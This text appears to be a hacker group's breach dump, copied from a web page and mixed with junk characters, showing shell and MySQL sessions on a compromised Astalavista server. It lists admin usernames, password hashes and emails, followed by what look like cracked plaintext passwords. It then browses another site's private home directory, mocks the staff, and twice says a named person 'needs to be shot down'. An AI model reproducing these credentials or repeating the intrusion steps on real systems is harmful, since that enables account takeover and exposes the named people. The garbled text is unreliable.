/ J7 o! w2 p) J <description>All availably Exploits.</description>
* e8 ]1 O) b' F; b <language>en-us</language>
+ w# \3 g7 ~0 S7 q/ Q <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>, @. b/ K5 @! @! U X. }7 L0 ^& V
<docs>http://blogs.law.harvard.edu/tech/rss</docs>
: I8 I% [5 P4 V/ v <generator>Astalavista.com</generator>
" U% w. |# A' \3 b <webMaster>info@astalavista.com</webMaster>’ . $items . ‘* c: B' x# F( w) M
</channel>
+ Q0 T w0 j/ C6 Q0 G5 p3 h</rss>’;$ c; x1 [! N( l: s" c+ b
^# z: s; V7 K; i+ i0 h. ~. o. n
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
8 W+ p+ j3 r# P) B# a unlink (FULLPATH . ‘/feed/exploits.xml’);& A5 [# {* g! A. d
}( m2 j7 S3 j. U
/ J# V: `" |' V file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);' \" B+ `+ |0 `! O$ \ p
[snip]- N+ Z/ Y9 w/ Z0 {8 B
, E0 R' w* }9 g* L7 esh-3.2$ cat exploits.sh2 F! c. R0 q/ d; ^( E
#!/bin/sh
1 c, g" J8 m" K8 e; I" Y @2 C( J5 B- W8 t! N9 j0 S! H* {# h
###########################################################( G( E6 z$ r" @0 z
# #2 G" p" H4 v% B4 v9 [
# Title: milw0rm exploits adder #! L4 l8 E# T2 }6 c r
# Description: Add all milw0rm exploits to the #: g& V( R0 i1 Z
# Astalavista.com database #
0 f3 E$ R2 M. N4 Z) {# #
3 o1 u6 [3 p0 k# {' p& l: T7 a! {+ J2 M# Company: Astalavista Group #; D! l, Z5 X4 d+ W }% T
# Author: Paulo M. Santos #
* O" `/ X4 s0 M; Z# E-Mail: 链接标记paulo.santos@astalavista.ch #
& @. J; R* I- R/ _; H9 W# #
7 k* {# A% V2 Y! a; @###########################################################
: V# U5 I2 ]+ f( y& s% V5 g0 b. M5 g$ d) T5 m0 J1 M/ L
# path; B' {: R3 i# [- d
this_path=/home/com/public_html/modifications/cronjobs% d9 ]7 a9 {4 [& j# v
$ m% l; r* P/ C ]# change directory
7 J% a; M( S4 ucd $this_path
% H* @/ s9 [/ m2 O/ t7 n5 ?% Kcd tmp/
( J! C. Y* p; w g( ~ i i6 m& H7 O* {5 f( z5 R. I2 B
# delete files
1 A W4 z& s" u/ _rm -rf milw0rm.tar.* &
' J* O" @8 G% F4 Trm -rf milw0rm/ &5 ]7 \! M" }# o) \! E
) e& O! ?! ^) C# q/ m' Z: o
# wget milw0rm paket2 P; `- v' A1 k
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
8 u1 H( ? G0 g) X5 T0 G$ z" _2 `/ G% d2 h+ O; ^
# extract milw0rm paket
6 S& h9 J' E3 x3 `: ]# {5 \' Qtar -xvf milw0rm.tar.bz22 n3 J9 z' o+ G" X( V
- b0 j1 P! P+ O5 T# change owner; M8 t. D$ n+ b+ a+ ^ H* Z
chown -R com .
5 V$ S# r; D" G. I! Vchgrp -R com .
( h" @3 z) m D$ n! E4 O! B5 z* u6 Q5 P6 s
# execute php script
- R) C8 p& N( ]/ y' S( |cd $this_path. W% z5 P& ]: |" p4 Z# h! z) q" u
php -q exploits.php# g: Q9 _2 K2 Y @
7 ?& p* C# Y% j& C- R1 Z3 l+ h: F# delete files+ M* j$ h. F4 s* q: E1 |
rm -rf tmp/milw0rm.tar.*$ B+ ? _7 g" x% t- ^
rm -rf tmp/milw0rm/5 X j: C6 A9 R% L/ J7 Z! I
- {- ?7 T& X5 xsh-3.2$ echo “Paulo M. Santos needs to be shot down.”
( O6 Z7 R- E6 RPaulo M. Santos needs to be shot down.
! `; J: n+ K0 x- H% f& U
# D( D; X0 A" J1 [+ @4 s' F# Dmysql -u contrexxuser2 -p5 d$ g: }1 k6 p" l
Enter password:
1 @4 i( L; B a7 Q) d+ ^Welcome to the MySQL monitor. Commands end with ; or \g.
* i/ ~3 o) g2 E2 u. \) J, A) kYour MySQL connection id is 261694
9 ~- e6 G# B4 RServer version: 5.0.45-community-log MySQL Community Edition (GPL)6 C) S. N7 `8 k) E
' k% z' ]5 q" |# C" v+ [1 H
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.7 z* l& m! H8 H3 s2 q$ ]0 S2 {
9 X% k5 A( z( C
mysql> show databases;
[# H& d. A/ G' N" Z+——————–+
`' r4 k- ?; R; \| Database |
) ^, X% h9 }' l" D4 n$ j+——————–+1 R9 n. j6 a; h
| information_schema |9 r: R# A, Z8 w* F
| com_contrexx2 |
Y) K- E- O1 `0 R& m- u4 r| com_contrexx2_live |
$ n3 K1 ~# v+ ~& ]. B| test |
. y& d1 p1 T# ?5 S( y- z- A1 _; ^+——————–+
9 h& y$ u) G$ {' V8 E4 rows in set (0.00 sec)' U3 T5 g& N {4 J) T& e7 l
' Z* |. k! o. ]9 amysql> use com_contrexx2_live) t2 C d5 _* B( Q
Database changed: e2 w! g [1 P( K2 e
mysql> show tables;
1 D$ P& T* _3 P* Z; g: M& n5 ^+————————————————–+# H8 P+ V& r" E* n
| Tables_in_com_contrexx2_live |
7 o, r9 o7 r& I+————————————————–+; l/ e5 L6 F9 U3 s* G! a
| cc_banner_counter |9 _' W4 d+ x. S
| cc_search_counter |
- S7 m; B9 V6 ? N; J- j| contrexx_access_group_dynamic_ids |5 [/ R, w" e `
| contrexx_access_group_static_ids |" P$ O# x) ]: B; q& H/ w
| contrexx_access_rel_user_group |: e+ {, @! z5 {6 v1 ~
| contrexx_access_settings |
) g6 N8 T# p8 P| contrexx_access_user_attribute |
/ A4 Y% I) i! C' u3 }* z0 q6 s K3 t; w| contrexx_access_user_attribute_name |
0 y+ \6 m+ _0 k+ D| contrexx_access_user_attribute_value |8 i% @5 I7 m3 k* k" X' U
| contrexx_access_user_core_attribute |
; L* Z" O1 D2 B- w| contrexx_access_user_groups |! H) F# G- r. s2 E/ D q
| contrexx_access_user_mail |, ~9 t+ o4 j7 _% j
| contrexx_access_user_profile |0 e4 `% \" M v% K: ]
| contrexx_access_user_title |
3 Z4 o; z: ^% O) [! B; x0 t| contrexx_access_user_validity |
2 Z n$ M: P7 W6 ?6 q( L; N- r| contrexx_access_users |
3 |! Z& L% N: r6 P. L8 v| contrexx_backend_areas |
4 C" a# S; J1 A, [( }$ K4 H| contrexx_backups |
- m/ z! K; q0 g/ l2 ?| contrexx_content |0 m/ J" {. b a$ a9 P
| contrexx_content_history |: v- F: }; }' W, H
| contrexx_content_logfile |
( I5 m% e& z5 B) E+ i| contrexx_content_navigation |
3 T( f2 A' p& H; Q| contrexx_content_navigation_history |5 D* K5 V# T4 l* C0 y
| contrexx_ids |# g5 H5 r$ {3 E, k" ?" P" ~/ P
| contrexx_languages |0 B2 \% g" g! y( t
| contrexx_lib_country |1 c0 w" n$ Y# y5 e
| contrexx_log |
) ]4 W5 A0 S$ f' J+ C& W| contrexx_module_alias_source |0 X% }: h5 D% d; I
| contrexx_module_alias_target |2 L3 i8 l6 E0 d1 U7 {5 g
| contrexx_module_block_blocks |* H* e2 ?( D' i0 d5 ]( G( Y2 b# c
| contrexx_module_block_rel_lang |
$ R+ Z0 l- G5 O( b0 r8 c( r| contrexx_module_block_rel_pages |' g1 W9 ?0 q1 l* S& F' ]8 \
| contrexx_module_block_settings |% F% N7 J4 i T" R) ]. ^$ i
| contrexx_module_blog_categories |" x) f- C7 q- J. q- }9 W! R
| contrexx_module_blog_comments |" I1 i# b; ?0 p4 S
| contrexx_module_blog_message_to_category |$ T- |: I6 C- x% q2 F$ {
| contrexx_module_blog_messages |
{, v, R) f: \| contrexx_module_blog_messages_lang |. A6 j4 Z! k# I/ q* r {
| contrexx_module_blog_networks |8 Z& w$ U! i$ ]% v2 ?
| contrexx_module_blog_networks_lang |
6 `6 A& q! G" }4 x* j" M0 `| contrexx_module_blog_settings |
I1 ^! M P9 p* S| contrexx_module_blog_votes |
. v3 T* ~- a, ?| contrexx_module_calendar |* u! H( y* y% S9 ^) p% h! S5 {+ K8 j# m5 [
| contrexx_module_calendar_access |
/ i' d8 _! X% z* `2 F! d9 S4 O5 ^) ^| contrexx_module_calendar_categories |' _4 k8 A4 T/ f4 M1 \7 A
| contrexx_module_calendar_form_data |
4 M2 I0 H. q9 z' m$ S/ b; D [+ T| contrexx_module_calendar_form_fields | S w' L/ ^9 L, ^3 M9 K1 C% N
| contrexx_module_calendar_registrations |
* F* j: t' c5 I6 A$ I% U& z( H" J& o| contrexx_module_calendar_settings |7 C4 P4 s* R. d$ E8 W+ e+ t
| contrexx_module_calendar_style |
2 \+ y7 ~/ d6 u0 c8 Z| contrexx_module_contact_form |
) ~+ A2 ]1 P2 N# l, D5 c( m3 S; A| contrexx_module_contact_form_data |$ ?2 B7 v/ y9 {( a7 x' ?/ Z4 Y
| contrexx_module_contact_form_field |
, e7 G0 J7 y; j| contrexx_module_contact_settings |
* ^% S4 A. l: B3 F% l| contrexx_module_data_categories |
* y: z! |* c; k/ j- O4 B| contrexx_module_data_message_to_category |- W i; b, T" Q. F% r, A
| contrexx_module_data_messages |5 G0 N+ V8 \0 X ?/ x+ ]2 d, i4 |
| contrexx_module_data_messages_lang |# Q4 @ e$ Z9 B+ f* G
| contrexx_module_data_placeholders |
& E1 L; z0 G( \( I| contrexx_module_data_settings |/ ?; s9 V* S$ X0 P
| contrexx_module_directory_access |
- P: o: o1 F# i6 _1 S# W% K| contrexx_module_directory_categories |
/ ? X* \. Y) {: h7 K& D, \| contrexx_module_directory_dir |
: g# d+ k' j* Y7 I% x& k: a| contrexx_module_directory_inputfields |# i5 D) K* M' w; D- P
| contrexx_module_directory_levels |9 O+ A2 ~% F/ i5 H
| contrexx_module_directory_mail |0 p/ `$ K) k" n
| contrexx_module_directory_rel_dir_cat |0 B& V5 w A; l7 b7 \( ?7 _4 M
| contrexx_module_directory_rel_dir_level |% T! i" R/ V u! c# v. O, ^
| contrexx_module_directory_settings |6 @# f* E9 D# F s: p2 h' v: L+ q
| contrexx_module_directory_settings_google |9 v( t" O- N+ q; a6 N G5 [* b
| contrexx_module_directory_vote |( R1 S4 d3 A6 q7 F
| contrexx_module_docsys |% s$ _$ i' g4 \8 R7 _
| contrexx_module_docsys_categories |! R5 A% D0 G1 q
| contrexx_module_egov_configuration |( c- P2 o$ d3 g: ]7 a+ [3 b8 z
| contrexx_module_egov_orders |
, X3 x8 W7 F8 Y' k J$ z| contrexx_module_egov_product_calendar |
( j: n9 B0 i) l6 Q. q| contrexx_module_egov_product_fields |
_7 i& ^/ `' i K% W' v+ C) i" c| contrexx_module_egov_products |3 Q% ]1 i5 y3 h4 A0 u
| contrexx_module_egov_settings |
4 M6 i+ A* r7 w6 A/ [7 n| contrexx_module_exploits |$ _4 K9 q' V( p
| contrexx_module_exploits_categories |
0 x- h: U/ c9 z2 S7 w) U8 S| contrexx_module_feed_category |
, a& ]/ J# E& R+ x+ W2 |. ?| contrexx_module_feed_news |
+ \6 f$ U" A1 [: f; j5 }6 S6 ^| contrexx_module_feed_newsml_association |
' k' ?: i5 i0 j o5 ]| contrexx_module_feed_newsml_categories |& i I; R4 R- u u' b
| contrexx_module_feed_newsml_documents |: C, y$ j, B" M& j; v3 j0 D1 m9 A; N
| contrexx_module_feed_newsml_providers |
; ]7 J6 w2 b5 r% Y' ~6 z2 G# h8 y| contrexx_module_forum_access |
- {' D w1 Y2 n- s- F( }5 j! c| contrexx_module_forum_categories |
: Y6 B& q, L, _8 z0 h| contrexx_module_forum_categories_lang |/ ], C+ _0 b, u2 q; N1 `- q
| contrexx_module_forum_notification |
2 V$ M6 X* v0 @| contrexx_module_forum_postings |
6 B' M3 F- h( S| contrexx_module_forum_rating |/ j' T/ F9 N# c* t! h& ]
| contrexx_module_forum_settings |
" _3 ?/ B! j# E# ?9 q| contrexx_module_forum_statistics |
! o! V6 \' X; ~) T: M9 p( K. x- F5 M| contrexx_module_gallery_categories |* Z# ~$ j: e7 \0 x7 |
| contrexx_module_gallery_comments |
1 C1 A/ r2 B% z! l9 c! J7 N- i5 S7 || contrexx_module_gallery_language |/ T. X& O: h; ]& J- G2 E+ y
| contrexx_module_gallery_language_pics |
) ^9 @% \7 d$ ^7 d2 s! @8 S# _ J9 ?| contrexx_module_gallery_pictures |
- [8 o- d) _; N! J! j" s" O| contrexx_module_gallery_settings |
$ V9 h. {& O# \9 Y% {| contrexx_module_gallery_votes |
3 u# T0 m6 O4 H$ O| contrexx_module_guestbook |
; j. Q$ U7 N" U) {0 W4 w, q3 n| contrexx_module_guestbook_settings |
9 b1 C* P! W, D: `$ z/ d- f# j| contrexx_module_livecam |
Y& g' x9 ~& }% X3 V% R* Q| contrexx_module_livecam_settings |$ G. y: y" L5 m
| contrexx_module_market |
5 z/ }+ }; \7 {: B# I7 a/ N| contrexx_module_market_access |
; R& L( m% l7 D9 V4 }1 x$ J| contrexx_module_market_categories |
+ N' u: [7 C" h# H8 G) b, W! {| contrexx_module_market_mail |; P# Z* D4 E( i9 e3 l" k( {
| contrexx_module_market_paypal |
1 H+ O1 \0 l& l- g: w `| contrexx_module_market_settings |3 m$ I* ?7 w; d
| contrexx_module_market_spez_fields |
6 Z4 A( b/ j. P$ T+ [) }8 G, U| contrexx_module_mediadir_access |
& }- G( X- Z* \' a| contrexx_module_mediadir_categories |; _1 J0 A, r/ ^ ]: U8 Y& D! L
| contrexx_module_mediadir_comments |, i' Y. x0 N1 Y) n; A, ?- _
| contrexx_module_mediadir_dir |0 G: C9 W! W, ]; ~
| contrexx_module_mediadir_inputfields |
2 H" o& F8 b' C2 ]8 M: m| contrexx_module_mediadir_levels |
7 q) A+ w; g& G* @! y; W| contrexx_module_mediadir_mail |. n$ G7 e: b8 d6 Z- |6 j
| contrexx_module_mediadir_rel_dir_cat |
& U/ K0 e! _: x| contrexx_module_mediadir_rel_dir_level |
+ r, n! G; c6 {& P. w" h' X: u8 @| contrexx_module_mediadir_reports |" B! M0 e0 k& t
| contrexx_module_mediadir_settings |
4 d1 y3 w! c) v! W/ x$ N% y& e, p| contrexx_module_mediadir_settings_google | I$ A8 p9 a3 Z5 y8 K, n$ ^
| contrexx_module_mediadir_vote |
4 _; _. L( ~# I: x% T9 N| contrexx_module_memberdir_directories |/ v1 X' U# G4 s+ v1 A
| contrexx_module_memberdir_name |2 C6 l5 t) V. M5 Y
| contrexx_module_memberdir_settings |
, w6 z4 B9 k3 L1 e4 g- d2 n5 S| contrexx_module_memberdir_values |, d" }) N5 f1 I. j; A2 ^; {
| contrexx_module_nettools_allowed_groups |+ M- I# Y. u3 K% p3 i1 X( K
| contrexx_module_nettools_settings |
% R3 g6 b4 k. k0 [' y; C, p V| contrexx_module_news |5 ^: N) A Z9 N9 C; j- k# n( R, h
| contrexx_module_news_access |
- j4 _: X. @+ [! {: {| contrexx_module_news_categories |8 P1 {! x) R0 v7 H$ N
| contrexx_module_news_settings |2 l' ?% g; v8 ?% L) ~* a0 g
| contrexx_module_news_teaser_frame |& P. f4 q# y7 \: l/ i9 f
| contrexx_module_news_teaser_frame_templates |1 h, y( J" k" h! P
| contrexx_module_news_ticker |
, |9 _( ?% d: r6 A| contrexx_module_newsletter |
. o9 h3 `2 ^/ k8 D$ t5 Z- @, u| contrexx_module_newsletter_attachment |- m' p, C$ n; q7 c+ k& c l) ?: _+ a
| contrexx_module_newsletter_category |
4 F1 p5 b$ d$ \% J# \. r' C| contrexx_module_newsletter_confirm_mail |
( b. @: l1 T8 V! |& T1 l; C: _| contrexx_module_newsletter_rel_cat_news |1 T. g8 T- e' d2 F- s& Q; x
| contrexx_module_newsletter_rel_user_cat |
0 {& s8 B) f, q3 p# t9 c| contrexx_module_newsletter_settings |
* p+ u( Y! d& W& Z7 }" y8 Q| contrexx_module_newsletter_template |
7 }/ k0 Z1 r" ]& C& g" ~. C/ d& C| contrexx_module_newsletter_tmp_sending |" }* N5 F% b& P* q7 L
| contrexx_module_newsletter_user |6 ^( U8 w% K! S* ]9 Y6 x+ {
| contrexx_module_newsletter_user_title |
/ [" P4 N# q% j8 S) Z# \7 C| contrexx_module_onlinetools_defaultports |
. P8 G" `5 }5 ^8 y4 h8 X| contrexx_module_onlinetools_defaultports_back |
1 R% Q, R' y" m1 ^| contrexx_module_onlinetools_geolitecity_blocks |# q- B: q( |9 F6 B4 V" u9 j' V9 t' b
| contrexx_module_onlinetools_geolitecity_country |
i. d. e! U$ G' l6 m/ Z" R$ E| contrexx_module_onlinetools_geolitecity_location |5 [- m& }0 [) i6 O7 x6 Q
| contrexx_module_podcast_category |8 `. t* @" r2 k3 t! }2 X- y) F
| contrexx_module_podcast_medium |
6 Y% z' H$ B! Z+ s# g i, x2 r| contrexx_module_podcast_rel_category_lang |
" ]: L2 I& E! n c5 s| contrexx_module_podcast_rel_medium_category |6 w9 t9 `6 e, [0 v2 y! `
| contrexx_module_podcast_settings |0 a4 C* w. L, h8 F
| contrexx_module_podcast_template |
2 `2 I: R9 J1 N Q| contrexx_module_proxydb |
- J, t) a& p, T+ K& l: X, C* p9 r| contrexx_module_recommend |# {& C$ [! A9 Q1 q# Z5 }
| contrexx_module_repository |0 w! T& X8 ^6 n u$ @9 t0 h" y
| contrexx_module_securitynews_cats | l. ] U; i) G# S
| contrexx_module_securitynews_feeds |% c! g$ g, ~. R, z" w9 G
| contrexx_module_securitynews_news |3 S* l7 i7 Y/ n4 ^* t
| contrexx_module_shop_categories |
0 Z5 x' K. O2 { w| contrexx_module_shop_config |
. b& {( {6 L& Y" _/ S1 u| contrexx_module_shop_countries |
! {4 y% h( E- Y" C7 C5 x| contrexx_module_shop_currencies |& h: `+ o6 Y) e q8 _* Y9 n
| contrexx_module_shop_customers |' J* m( u: F, G, i
| contrexx_module_shop_importimg |( ], R. _/ h, s$ b* U
| contrexx_module_shop_lsv |# ?7 \# Y1 r8 r( Y% K' Z
| contrexx_module_shop_mail |1 ~- K+ I" ?! G' Z
| contrexx_module_shop_mail_content |3 X& P8 g0 J! J. N7 h9 k) V; f* U
| contrexx_module_shop_manufacturer |- Y( i5 |) p* O. c9 u n
| contrexx_module_shop_order_items |
4 T! ?+ G8 y1 l6 t' v' i+ T| contrexx_module_shop_order_items_attributes |' w, P! Y( O( R' O' @* `$ x/ J
| contrexx_module_shop_orders |
2 U/ s, V I$ K" O3 ]) b5 ]$ I| contrexx_module_shop_payment |
' m& V- v& a( }, G% O- `4 \| contrexx_module_shop_payment_processors |3 J: y" s& O$ f; M$ ~1 Z' r
| contrexx_module_shop_pricelists |0 ^5 J- X! X' Z% S
| contrexx_module_shop_products |; z- Y9 W" \: M
| contrexx_module_shop_products_attributes |. |- s& _- \6 |" \# J$ K0 Z7 l
| contrexx_module_shop_products_attributes_name |# M* i$ g3 ^* C
| contrexx_module_shop_products_attributes_value |
& _9 y* G; h7 D; F| contrexx_module_shop_products_downloads |
# @- o2 E! c; T5 {| contrexx_module_shop_rel_countries |7 I: P Q( S1 _3 b3 a
| contrexx_module_shop_rel_payment |( x1 y- K5 n0 h6 H
| contrexx_module_shop_rel_shipment |
, B/ g4 T# Z7 i [( Y: ^3 l! ]| contrexx_module_shop_shipment_cost |
1 s3 K1 k7 }/ N2 Z) w| contrexx_module_shop_shipper |: K' e1 X& \7 d2 n; a& _8 X! t. C0 G* [6 d
| contrexx_module_shop_vat |
. H0 e8 E: Q. t| contrexx_module_shop_zones |
5 H& G$ B3 K4 ?5 F/ p7 l| contrexx_module_u2u_address_list |# Z1 o' t t4 O+ i+ E/ J& ]
| contrexx_module_u2u_message_log |
, O% E9 t u B* h5 B- o: o- U* C% \; f| contrexx_module_u2u_sent_messages |1 x! `9 G, }! A) @" V; Q9 P* p. t
| contrexx_module_u2u_settings |2 D9 l1 i6 F+ I& E+ f
| contrexx_module_u2u_user_log |
1 i% Z! l, ~3 v& r4 S1 _/ b| contrexx_modules |
0 Q0 [! b0 @, F" P1 e/ q| contrexx_sessions |: e) ^+ f. w* t& A P* ?" `. y+ m
| contrexx_settings |
: X) i0 ^/ G, ^3 H" U% G| contrexx_settings_smtp |
( S/ E2 I/ h& d| contrexx_skins |
3 z; Y4 @+ ~" M* p% P Q/ I' i$ n| contrexx_stats_browser |$ V! g0 H" e# i- l; ?4 H* X" o
| contrexx_stats_colourdepth |
2 ]8 w4 v+ b# @8 _% ?* R| contrexx_stats_config |
' E# z: U2 a3 v| contrexx_stats_country |; e4 g* N0 L! k6 S% l
| contrexx_stats_hostname |
; ]* h- ]4 C! [, |/ }| contrexx_stats_javascript |
$ [/ p$ w6 o i, _7 F2 I| contrexx_stats_operatingsystem |
# @- M- {) q1 \4 s| contrexx_stats_referer |9 l" Q/ F: @, v. k
| contrexx_stats_requests |. O6 m" k/ B5 s
| contrexx_stats_requests_summary |* S) s2 q- Y* e$ N O- K
| contrexx_stats_screenresolution |+ W. k9 z8 V! Z. a- V1 x( P
| contrexx_stats_search |
7 @4 h. k+ A+ ] d| contrexx_stats_spiders |
1 X5 l% {# Q, [! i B' B| contrexx_stats_spiders_summary |
# K1 _3 @) [0 n| contrexx_stats_visitors | H: ] F; s8 J! M
| contrexx_stats_visitors_summary |, r2 N" Q b! _# F' ?
| contrexx_voting_additionaldata |0 | m# v" `9 C/ q: e# t4 o
| contrexx_voting_email |0 I I1 w/ y" N/ W
| contrexx_voting_rel_email_system |
6 y; l u9 ^( k( U3 y4 J| contrexx_voting_results |
' m9 }# Q2 ]* l/ F/ d: B3 ?: F* J# K| contrexx_voting_system |
' I1 F" j% B0 E) r| foo |+ B, q h! ?* c7 u1 l
+————————————————–+
0 Q' x9 P+ {6 b* a& t- f! B) j3 m227 rows in set (0.01 sec)
0 p* q( O. l( J4 f$ ]
- a/ P% i/ {- O6 r) vmysql> select count(*) as skids from contrexx_access_users;
+ I: T6 X' |% j7 ^+——-+
8 D& X$ ?* j2 a" ~| skids |( i5 ]4 x) L2 K7 V9 a: n* D0 I$ f
+——-+
# ~, ?1 h$ D7 C' w7 _9 b4 w| 53699 |
5 h& o" B# k5 O+——-+1 _1 V3 a' X! p ]/ \% K3 T# s' Q
1 row in set (0.00 sec)+ a# Y# w. C, v$ p' |& g* O& W6 R
! ~2 q0 ?0 M) U8 Q! ~
mysql> describe contrexx_access_users;5 T3 z% c( j* s" q
+——————+——————————————+——+—–+————–+—————-+
: o+ d6 e9 s5 s: [& R| Field | Type | Null | Key | Default | Extra |
$ Z. S$ f& ^2 W( T, y+——————+——————————————+——+—–+————–+—————-+
. T+ e: g# u3 p% {1 K4 r( w! G. @| id | int(10) unsigned | NO | PRI | NULL | auto_increment |/ _+ s# Z3 `, o5 ^- N4 [
| is_admin | tinyint(1) unsigned | NO | | 0 | |
# i" z# |$ x, Z8 n$ u( a9 W- q1 ^| username | varchar(40) | YES | MUL | NULL | |
/ T$ A3 B, s& [6 ~) I4 \9 z| password | varchar(32) | YES | | NULL | |% b/ N2 S( X' o) a4 Q
| regdate | int(14) unsigned | NO | | 0 | |
5 {* l; e" ?& h+ b3 X5 z- d& k; ~| expiration | int(14) unsigned | NO | | 0 | |
. m) l' b9 J6 I2 d1 @0 z| validity | int(10) unsigned | NO | | 0 | |
. S6 w/ g) ?/ U* D8 m' a' f( u| last_auth | int(14) unsigned | NO | | 0 | |& S, I3 v1 I, c$ R) s& C% p% D2 x
| last_activity | int(14) unsigned | NO | | 0 | |6 D5 \ l( ?( M6 W- y% t
| email | varchar(255) | YES | | NULL | |5 X c5 H7 P5 P8 v4 A: u& D0 X
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
8 Y/ C) ]9 z, Z. l4 |8 Z( i| frontend_lang_id | int(2) unsigned | NO | | 0 | |
* c' G4 D' h! A2 t" [* A| backend_lang_id | int(2) unsigned | NO | | 0 | |( ^% M8 m: _ W0 E: R! i3 } f
| active | tinyint(1) | NO | | 0 | |
' m+ J2 }) u+ n2 S) \9 d1 D' X8 k| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |9 f+ Z/ a {; P) Q0 c5 O
| restore_key | varchar(32) | NO | | | |
/ `' o! N2 j( f8 I* d! x _| restore_key_time | int(14) unsigned | NO | | 0 | |
' }6 h b. ^% l' H; R$ p$ i' Y| u2u_active | enum(’0′,’1′) | NO | | 1 | |; Y; V" F7 Z0 l- b4 Q4 K" g: X$ O
+——————+——————————————+——+—–+————–+—————-+) W" u! Y7 V5 A
18 rows in set (0.00 sec)
% d0 l8 H$ N$ M# [" W: G
& ~! c& A8 U7 z( tmysql> select username,password,email from contrexx_access_users where is_admin = 1;
' @) ~4 m; U7 N8 B+————+———————————-+—————————–+5 J5 ?. y; K( {$ r
| username | password | email |
9 m, Z; p! m6 }6 o+————+———————————-+—————————–+' x1 S. z+ H" y* z0 ]* q6 Z
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
. R+ a$ J8 {0 V9 a ^/ Z& U+ _| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
$ Z+ j* A' G. X2 H& @7 d| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |% \1 L4 [6 S$ C! k& L( y* j$ m0 @
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |
7 F# X1 @, k$ k/ l$ @, D( u M+ Z) }+————+———————————-+—————————–+, m, H4 R& F _
4 rows in set (0.04 sec)
9 B/ b0 J$ H* w3 X7 }7 h
2 N- F; Q, E3 h7 q- V/ J+ k- y2 Emysql> exit;
+ S; E; H; x2 ^9 i H, FBye& Y. e# V7 f/ o! I1 P
0 z! F. E( q0 z/ _+ u G. s[~] There you go, your “team of security and IT professionals” is a joke.
8 `3 ^! t9 g( X/ e
+ l2 U7 V' w8 |+——————————+
: l# s9 S& V$ d+ i8 Nsystem:f82BN3+_*- `) v: o! O! V
Be1er0ph0r:belerophor4astacom
, x$ ]3 E4 B" Lprozac:asta4cms!
; e: J9 a% P; b- @/ L, v+ g+ V$ Pcommander:mpbdaagf6m1 m O$ r& J4 ?
sykadul:ak29eral Z! g2 `+ U* {* r: h$ \
+——————————+
+ S) R& r/ V% F$ ^
( [) d; A) z/ A: ^- i) m+ }[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)1 D6 w' |4 t& O5 i6 J6 Q; t- j
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it., W; J" _7 o6 L, f" |" A2 Z
0 _! ^8 m$ K! y) o* c[~] Lets move to astalavista.net now,$ v8 X5 M: L6 K6 |! e
7 W+ ?0 [" |$ s+ h
From <链接标记[url]https://www.astalavista.net/[/url]>:
! b) k. G* Y: T2 E>> Everyone knows that the best defense is a good offense.
4 O K" N- I2 X& ]>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.; j# k! k5 G- u+ N
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
6 Y- N6 F, N+ y0 q* B. v$ g0 o1 L>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
6 `3 v( Q# E1 H- e {- H1 C2 K; m6 W# q; A& T, g
>> Go ahead, try and hack our server . in a completely legal way!. |, I( y* N! f1 M5 q) S
>> Learn by doing: We offer our members tricky tasks and challenges on an
m5 K, k( l3 A7 d" H) n( X>> ongoing basis so you can test your knowledge and abilities. You can also
3 B: G$ s' u) G& T- b>> demonstrate what you.ve mastered by taking part in regular hacker contests! }. j& e1 o; {
>> and war games
4 j; u# x1 C# R* l% K4 [ j& Y H$ C8 x% g% C. _$ y' h
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
) p+ Y2 _# V* U2 y: [6 i" T9 H" E7 K W, X6 U1 B- g: P M
[-] Tricky task: Find home dir of astalavista.net
! n( _* m/ ~3 d+ i' Y( H( Y6 ~: T& T- T& l
sh-3.2$ ls -la ~astanet* l! K+ V* n7 v) b' N. d
total 48
" s! q% ~. i7 \* m. q$ c4 ddrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .
2 F& Y1 D" K* B3 ]1 x$ Zdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
; Z, O& E( e/ b6 c2 edrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth- y. v& D) f, @' l! A& k- [- K/ E
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
/ U, [3 N0 A8 E-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout! |$ O- T/ @ B& U
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
' p- X- U! C$ H9 u2 o/ I-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
7 y" V% H( l5 Bdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains4 }$ m4 l' @% e. B" \9 B
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap% U6 f3 B; q3 h# I0 C( i
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail: m% f! j' O" n( g* d" L; c" p
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
# n" |1 J) p& g9 t5 [ g9 r9 M6 V-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow" B5 n4 N' {) d! F
+ i4 A' e* j. [/ \
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
+ D1 n* w# b) y- R4 ]sh-3.2$ ls -la
8 }7 C. X b/ _+ Ntotal 200# o0 T! ~ T( Y& x1 `! W
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
9 p2 H9 |% Y- b( C1 |2 O; sdrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
